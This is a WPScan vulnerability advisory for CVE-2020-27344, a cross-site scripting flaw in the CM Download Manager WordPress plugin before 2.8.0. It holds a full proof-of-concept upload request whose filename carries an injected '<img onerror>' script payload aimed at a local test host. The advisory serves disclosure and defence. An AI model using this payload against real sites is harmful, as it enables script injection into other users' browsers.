WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

CM Download Manager < 2.8.0 - Authenticated Cross-Site Scripting

Description

The plugin does not properly validate and sanitise the uploaded filename, which could result in a Cross-Site Scripting issue.

Proof of Concept

Vulnerable page - 'cmdownload/add/'
Vulnerable parameter - 'filename' in 'Content-Disposition' Header


POST /cmdownload/add/ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------297219106631036445401265881685
Content-Length: 1147
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/cmdownload/add/
Cookie: comment_author_8dec71ede39ad9ff3b3fbc03311bdc45=eee; comment_author_email_8dec71ede39ad9ff3b3fbc03311bdc45=eee%40mail.ru; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_8dec71ede39ad9ff3b3fbc03311bdc45=test%7C1595793663%7C2B6NRI0OfyfJBfpulgmlcilvU96g754sgpLJh8GeNdA%7Ccf65a0a17f07e0e3180504eed05869ab0aa68af496aba7d26aa1848edf97fbea; wp-settings-time-1=1595621338; PHPSESSID=153061963252781ff3b221c0305d536e; wp-settings-1=editor%3Dtinymce
Upgrade-Insecure-Requests: 1

-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_title"

test name
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_package"; filename="users.doc<img src=a onerror=alert('XSS')>"
Content-Type: application/msword

some test data

-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_categories[]"

17
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_description"

222
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_screenshots"

[]
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_screenshots-caches"

[]
-----------------------------297219106631036445401265881685
Content-Disposition: form-data; name="CMDM_AddDownloadForm_submit"

Add
-----------------------------297219106631036445401265881685--

Affects Plugins

cm-download-manager
Fixed in version 2.8.0

References

CVE
CVE-2020-27344
URL
https://gist.github.com/qwebee/da79c6a9fa982c3c40988a1e0598c0d9

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

qwebee

Verified

No

WPVDB ID
461d770c-98be-4c09-9fe8-da4fe74aac2b

Timeline

Publicly Published

2020-10-22 (about 1 years ago)

Added

2020-10-22 (about 1 years ago)

Last Updated

2020-10-23 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin